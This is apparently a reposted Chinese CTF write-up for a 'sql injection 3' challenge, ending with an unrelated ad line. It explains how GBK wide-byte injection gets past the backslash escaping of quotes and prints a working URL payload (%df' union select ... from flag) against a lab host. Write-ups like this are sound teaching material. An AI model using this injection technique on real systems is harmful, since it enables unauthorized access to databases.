sql injection 3

打开就看见

执行的sql语句:SELECT id,title FROM news WHERE id=’1’

尝试闭合'构造语句,发现无论怎么构造都会出现

http://115.28.150.176/sqli/index.php?id=1’ select * from news

看来需要干掉/。尝试id ,发现id=2时出现提示

id: 2 title: gbk_sql_injection

看来是宽字节注入
可知当存在%df时就会吃掉
多次尝试,最终构造

http://115.28.150.176/sqli/index.php?id=%df’ union select *,1 from flag%23

出现flag

【推广】 免费学中医,健康全家人
原文地址:https://www.cnblogs.com/maodun/p/6915823.html